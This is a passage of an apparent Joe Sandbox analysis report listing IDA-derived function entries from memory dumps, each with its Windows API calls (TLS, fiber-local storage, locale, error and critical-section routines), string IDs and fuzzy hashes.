                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6D21B661B1D64281FA559F15B81177533A1AF8C7D0F079239DD9D077B4EFACE9408381
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-1-0(?,?,?,00007FFEEE1DE1FB), ref: 00007FFEEE1DE2E0
                                                                                                                                                                                                  • GetUserDefaultLCID.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(?,?,?,00007FFEEE1DE1FB), ref: 00007FFEEE21605D
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000010.00000002.1552353019.00007FFEEE1C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFEEE1C0000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000010.00000002.1552320581.00007FFEEE1C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1552452581.00007FFEEE275000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1552509174.00007FFEEE2AF000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1552536826.00007FFEEE2B2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_16_2_7ffeee1c0000_56C7.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: AddressDefaultProcUser
                                                                                                                                                                                                  • String ID: GetUserDefaultLocaleName$IsValidLocaleName
                                                                                                                                                                                                  • API String ID: 306211784-3812970866
                                                                                                                                                                                                  • Opcode ID: 6de41d5f5313b39fdf11730a669525d9c1f1cd8a2f9373217a76878fdf8f655c
                                                                                                                                                                                                  • Instruction ID: d3e2196351ef33c7b3cfd1c411648931eded9b67645cde24ee2a995be72af4d9
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6de41d5f5313b39fdf11730a669525d9c1f1cd8a2f9373217a76878fdf8f655c
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8421B161A0CA4282FA548F55B8107B92391AF8C7D4F07523ADD9D177F4EFACE9418342
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-1-0(?,?,?,00007FFEEE22D154,?,?,?,?,00007FFEEE1D709B), ref: 00007FFEEE22D799
                                                                                                                                                                                                  • TlsFree.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(?,?,?,00007FFEEE22D154,?,?,?,?,00007FFEEE1D709B), ref: 00007FFEEE22D804
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000010.00000002.1552353019.00007FFEEE1C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFEEE1C0000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000010.00000002.1552320581.00007FFEEE1C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1552452581.00007FFEEE275000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1552509174.00007FFEEE2AF000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1552536826.00007FFEEE2B2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_16_2_7ffeee1c0000_56C7.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: AddressFreeProc
                                                                                                                                                                                                  • String ID: FlsFree$LCMapStringEx
                                                                                                                                                                                                  • API String ID: 4110577592-1627765421
                                                                                                                                                                                                  • Opcode ID: 08e3f97a92b361267e144c6ae74d5b496c91b98002f5abc4f9b2827e390f001c
                                                                                                                                                                                                  • Instruction ID: d63a876c028d27a8b13e614768a886f92ec334404e3cc0b417d9af84eadf5f2a
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 08e3f97a92b361267e144c6ae74d5b496c91b98002f5abc4f9b2827e390f001c
                                                                                                                                                                                                  • Instruction Fuzzy Hash: D621C461A1960282FE198F14B82077522D16FCC794F479239ED9E473F4EFACED408242
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-1-0(?,?,?,00007FFEEE1D6FE6), ref: 00007FFEEE1D769F
                                                                                                                                                                                                  • TlsAlloc.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(?,?,?,00007FFEEE1D6FE6), ref: 00007FFEEE1D76DF
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000010.00000002.1552353019.00007FFEEE1C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFEEE1C0000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000010.00000002.1552320581.00007FFEEE1C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1552452581.00007FFEEE275000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1552509174.00007FFEEE2AF000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1552536826.00007FFEEE2B2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_16_2_7ffeee1c0000_56C7.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: AddressAllocProc
                                                                                                                                                                                                  • String ID: FlsAlloc$LCMapStringEx
                                                                                                                                                                                                  • API String ID: 2924745751-1958574131
                                                                                                                                                                                                  • Opcode ID: 52871a79671c4f628470ebf279ca615ca428cd953d39a408f8540e4ea56dfa3a
                                                                                                                                                                                                  • Instruction ID: 56bbde69a70e3a60073bbf164e392a6d717a4b8f6d1b70edab01d63d08ca0077
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 52871a79671c4f628470ebf279ca615ca428cd953d39a408f8540e4ea56dfa3a
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8D21B261A1974281FA558F29B8117B52391AF8C7D4F075239EDAD477B4FFACE8848301
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • TlsSetValue.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(?,?,?,00007FFEEE1E1F4E,?,?,?,?,?,00007FFEEE1E1F01), ref: 00007FFEEE213232
                                                                                                                                                                                                  • GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-1-0(?,?,?,00007FFEEE1E1F4E,?,?,?,?,?,00007FFEEE1E1F01), ref: 00007FFEEE213248
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000010.00000002.1552353019.00007FFEEE1C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFEEE1C0000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000010.00000002.1552320581.00007FFEEE1C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1552452581.00007FFEEE275000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1552509174.00007FFEEE2AF000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1552536826.00007FFEEE2B2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_16_2_7ffeee1c0000_56C7.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: AddressProcValue
                                                                                                                                                                                                  • String ID: FlsSetValue$LCMapStringEx
                                                                                                                                                                                                  • API String ID: 1414840956-3586097892
                                                                                                                                                                                                  • Opcode ID: 53de3e512ccb66b431a7c3155f2d458e209e329cd8c00b4f72dde238609dd6ac
                                                                                                                                                                                                  • Instruction ID: d93c4d966a44bb8affdea1849a1924d8a0dabff2a8d1cceaf52f54247cb88e48
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 53de3e512ccb66b431a7c3155f2d458e209e329cd8c00b4f72dde238609dd6ac
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 29215665B1970282FA549F19F81037562926F8C760F079739C9AD573F8EEBCE9458202
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • TlsSetValue.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(?,?,?,00007FFEEE1E24DE,?,?,?,?,?,?,?,?,?,00007FFEEE1E2379), ref: 00007FFEEE2132D3
                                                                                                                                                                                                  • GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-1-0(?,?,?,00007FFEEE1E24DE,?,?,?,?,?,?,?,?,?,00007FFEEE1E2379), ref: 00007FFEEE2132E9
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000010.00000002.1552353019.00007FFEEE1C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFEEE1C0000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000010.00000002.1552320581.00007FFEEE1C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1552452581.00007FFEEE275000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1552509174.00007FFEEE2AF000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1552536826.00007FFEEE2B2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_16_2_7ffeee1c0000_56C7.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: AddressProcValue
                                                                                                                                                                                                  • String ID: FlsSetValue$LCMapStringEx
                                                                                                                                                                                                  • API String ID: 1414840956-3586097892
                                                                                                                                                                                                  • Opcode ID: b6a1fe3d016932c687377a0b0bd6db3313e0398f0c172229d9a6fa604d345480
                                                                                                                                                                                                  • Instruction ID: 5e3ca471367b631852a393d5c4f381c0e23c0b4815d8912c10c190bd9e9aa668
                                                                                                                                                                                                  • Opcode Fuzzy Hash: b6a1fe3d016932c687377a0b0bd6db3313e0398f0c172229d9a6fa604d345480
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3A214461B1970682FA549F15F8503752392AF8C7A0F079739C9AD077F8DEACE9458342
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-1-0(?,?,00000000,00007FFEEE1D3484,?,?,?,00007FFEEE2139B1,?,?,?,?,00007FFEEE1D78EA,?,?,?), ref: 00007FFEEE1D3AB9
                                                                                                                                                                                                  • TlsGetValue.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(?,?,00000000,00007FFEEE1D3484,?,?,?,00007FFEEE2139B1,?,?,?,?,00007FFEEE1D78EA,?,?,?), ref: 00007FFEEE20C59E
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000010.00000002.1552353019.00007FFEEE1C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFEEE1C0000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000010.00000002.1552320581.00007FFEEE1C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1552452581.00007FFEEE275000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1552509174.00007FFEEE2AF000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1552536826.00007FFEEE2B2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_16_2_7ffeee1c0000_56C7.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: AddressProcValue
                                                                                                                                                                                                  • String ID: FlsGetValue$LCMapStringEx
                                                                                                                                                                                                  • API String ID: 1414840956-552164261
                                                                                                                                                                                                  • Opcode ID: d64a5d3ffbdea9515a3ca7683bb0a3791a94bfe81829277ad067d39434604beb
                                                                                                                                                                                                  • Instruction ID: 48b67fdac1d22ec1802c579f69afb9279118f977b2d5b9bb5b1ea7e581cf2ba9
                                                                                                                                                                                                  • Opcode Fuzzy Hash: d64a5d3ffbdea9515a3ca7683bb0a3791a94bfe81829277ad067d39434604beb
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8D218E65B1970282FA548F28B8503742391AF8C7A0F075739D9AD573F8EEBCE8858302
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000010.00000002.1551419790.00007FF7102C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7102C0000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000010.00000002.1551387449.00007FF7102C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1551462787.00007FF7102EB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1551513938.00007FF7102FE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1551513938.00007FF710303000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1551594165.00007FF710306000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_16_2_7ff7102c0000_56C7.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Message$ByteCharMultiWide
                                                                                                                                                                                                  • String ID: Error$Error/warning (ANSI fallback)
                                                                                                                                                                                                  • API String ID: 1878133881-653037927
                                                                                                                                                                                                  • Opcode ID: f4c9aea142df8fc367965a88b37001c6795115f60fce42f8f88369c54fa23369
                                                                                                                                                                                                  • Instruction ID: 47f60dfdde2243a8c79ef970cccaf545cd3f9033f38aeb1898e36fa7a5f22e15
                                                                                                                                                                                                  • Opcode Fuzzy Hash: f4c9aea142df8fc367965a88b37001c6795115f60fce42f8f88369c54fa23369
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4F118E72628E8681EA21AB00E551BAAA768FB44B94FD05136EA8C17744CF3CE609C720
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000010.00000002.1551419790.00007FF7102C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7102C0000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000010.00000002.1551387449.00007FF7102C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1551462787.00007FF7102EB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1551513938.00007FF7102FE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1551513938.00007FF710303000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1551594165.00007FF710306000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_16_2_7ff7102c0000_56C7.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Message$ByteCharMultiWide
                                                                                                                                                                                                  • String ID: Error/warning (ANSI fallback)$Warning
                                                                                                                                                                                                  • API String ID: 1878133881-2698358428
                                                                                                                                                                                                  • Opcode ID: bedc3c020f71ec751042cc21f49bee78fdd2451348ef76e59aa444c99166d18b
                                                                                                                                                                                                  • Instruction ID: df67154608e588c9dd93915a649fb08608e411536b62a39ee169e62efbd28813
                                                                                                                                                                                                  • Opcode Fuzzy Hash: bedc3c020f71ec751042cc21f49bee78fdd2451348ef76e59aa444c99166d18b
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4A118E62628E8581EA21AB00E551BAAB764FB44B94F905136DA8C17744CF3CE608C760
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000010.00000002.1552353019.00007FFEEE1C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFEEE1C0000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000010.00000002.1552320581.00007FFEEE1C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1552452581.00007FFEEE275000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1552509174.00007FFEEE2AF000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1552536826.00007FFEEE2B2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_16_2_7ffeee1c0000_56C7.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: ErrorLast
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 1452528299-0
                                                                                                                                                                                                  • Opcode ID: 995f622ee0478ad80666a64d0f6f1b33d60a04ac0258514eced1de964909b684
                                                                                                                                                                                                  • Instruction ID: 4e606da4fd6987e2c895f91e764c4980d3f9336e722503e2b6d2a42d41b6dd1b
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 995f622ee0478ad80666a64d0f6f1b33d60a04ac0258514eced1de964909b684
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 37315F34F0C64386F658AB21B5513797291AF887A1F070235E5EE567F6DFBCB8818302
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,00000000,00007FFEEE1C2468,?,?,00000000,?,00000000,00007FFEEE1C2036), ref: 00007FFEEE1D37AF
                                                                                                                                                                                                  • SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,00000000,00007FFEEE1C2468,?,?,00000000,?,00000000,00007FFEEE1C2036), ref: 00007FFEEE1D37FE
                                                                                                                                                                                                  • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,00000000,00007FFEEE1C2468,?,?,00000000,?,00000000,00007FFEEE1C2036), ref: 00007FFEEE1D3819
                                                                                                                                                                                                  • SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,00000000,00007FFEEE1C2468,?,?,00000000,?,00000000,00007FFEEE1C2036), ref: 00007FFEEE1D3831
                                                                                                                                                                                                  • SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,00000000,00007FFEEE1C2468,?,?,00000000,?,00000000,00007FFEEE1C2036), ref: 00007FFEEE1D389D
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000010.00000002.1552353019.00007FFEEE1C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFEEE1C0000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000010.00000002.1552320581.00007FFEEE1C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1552452581.00007FFEEE275000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1552509174.00007FFEEE2AF000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1552536826.00007FFEEE2B2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_16_2_7ffeee1c0000_56C7.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: ErrorLast
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 1452528299-0
                                                                                                                                                                                                  • Opcode ID: c2ae306a1fc25cde0675015cfd2c7e2ee1f2785b707fe40c3e176b6001e996c2
                                                                                                                                                                                                  • Instruction ID: bd33d521677dd88b6523317d90be717d250cb70d86b38197063207aa298c69eb
                                                                                                                                                                                                  • Opcode Fuzzy Hash: c2ae306a1fc25cde0675015cfd2c7e2ee1f2785b707fe40c3e176b6001e996c2
                                                                                                                                                                                                  • Instruction Fuzzy Hash: AF315D30F0C64386F614AB21B54537D3251AF887A1F070336E9EE566F6DFBCA8918342
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000010.00000002.1552353019.00007FFEEE1C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFEEE1C0000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000010.00000002.1552320581.00007FFEEE1C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1552452581.00007FFEEE275000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1552509174.00007FFEEE2AF000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1552536826.00007FFEEE2B2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_16_2_7ffeee1c0000_56C7.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: ErrorLast
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 1452528299-0
                                                                                                                                                                                                  • Opcode ID: 5c77dfd06bf0c4a08de7cbd3e0678428effb9ddff0ba386b0be6a990e184cb36
                                                                                                                                                                                                  • Instruction ID: 2180cd8f543f888cc0793593fa573e016bc6f05d4ef68aa7b65b31bb4617a6a3
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5c77dfd06bf0c4a08de7cbd3e0678428effb9ddff0ba386b0be6a990e184cb36
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 25314130B0C64386F664AB25B54137962519F88791F070736D5EE567F6DFBCE9808302
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,00000001,00007FFEEE2660F5), ref: 00007FFEEE1D3324
                                                                                                                                                                                                  • SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,00000001,00007FFEEE2660F5), ref: 00007FFEEE1D3373
                                                                                                                                                                                                  • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,00000001,00007FFEEE2660F5), ref: 00007FFEEE1D3389
                                                                                                                                                                                                  • SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,00000001,00007FFEEE2660F5), ref: 00007FFEEE1D33A1
                                                                                                                                                                                                  • SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,00000001,00007FFEEE2660F5), ref: 00007FFEEE1D340A
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000010.00000002.1552353019.00007FFEEE1C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFEEE1C0000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000010.00000002.1552320581.00007FFEEE1C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1552452581.00007FFEEE275000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1552509174.00007FFEEE2AF000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1552536826.00007FFEEE2B2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_16_2_7ffeee1c0000_56C7.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: ErrorLast
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 1452528299-0
                                                                                                                                                                                                  • Opcode ID: 1ac66b635d249aedb6595ff3c920d5dc40e6242194dc6f8228f48c41243d32ff
                                                                                                                                                                                                  • Instruction ID: 18ada65797adfe6f9dc92bd4fb833edb6916fb72d63e96408e7df9752589b54e
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1ac66b635d249aedb6595ff3c920d5dc40e6242194dc6f8228f48c41243d32ff
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 64316030F0C64386FA69AB24B55137962519F88BA1F070235E5EE167F6DFBCE8818342
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,?,00007FFEEE1DF0A6), ref: 00007FFEEE1DF2F0
                                                                                                                                                                                                  • EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,?,00007FFEEE1DF0A6), ref: 00007FFEEE1DF346
                                                                                                                                                                                                  • EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,?,00007FFEEE1DF0A6), ref: 00007FFEEE1DF3BC
                                                                                                                                                                                                  • LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,?,00007FFEEE1DF0A6), ref: 00007FFEEE1DF3D2
                                                                                                                                                                                                  • LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,?,00007FFEEE1DF0A6), ref: 00007FFEEE1DF3EB
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000010.00000002.1552353019.00007FFEEE1C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFEEE1C0000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000010.00000002.1552320581.00007FFEEE1C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1552452581.00007FFEEE275000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1552509174.00007FFEEE2AF000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1552536826.00007FFEEE2B2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_16_2_7ffeee1c0000_56C7.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: CriticalSection$Enter$Leave
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 2801635615-0
                                                                                                                                                                                                  • Opcode ID: 912060f8c2e11bf4a4245dfa8e8fe6ad5dfb5130a46c5078e16335f9b2efa0b3
                                                                                                                                                                                                  • Instruction ID: 59a0c9f78f23aa491afb98a90ab2ef62a986b2bf47d0f5cb5ad81138160c49fb
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 912060f8c2e11bf4a4245dfa8e8fe6ad5dfb5130a46c5078e16335f9b2efa0b3
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5531B226A18B8691EA508F11F8843796754FB9CBD5F1B0236D9DE063B4DFBCE681C301
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000010.00000002.1551419790.00007FF7102C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7102C0000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000010.00000002.1551387449.00007FF7102C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1551462787.00007FF7102EB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1551513938.00007FF7102FE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1551513938.00007FF710303000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1551594165.00007FF710306000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_16_2_7ff7102c0000_56C7.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: FileWrite$ConsoleErrorLastOutput
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 2718003287-0
                                                                                                                                                                                                  • Opcode ID: 0739f85a4d911baae0561c1f2f5b651aa469f8b70ac1dc09fd50f765aaaafbc7
                                                                                                                                                                                                  • Instruction ID: 2a98f646f3c314e8f2e1ad36929f9eccd7b92f8040ef32d907b9c4db05e83e5e
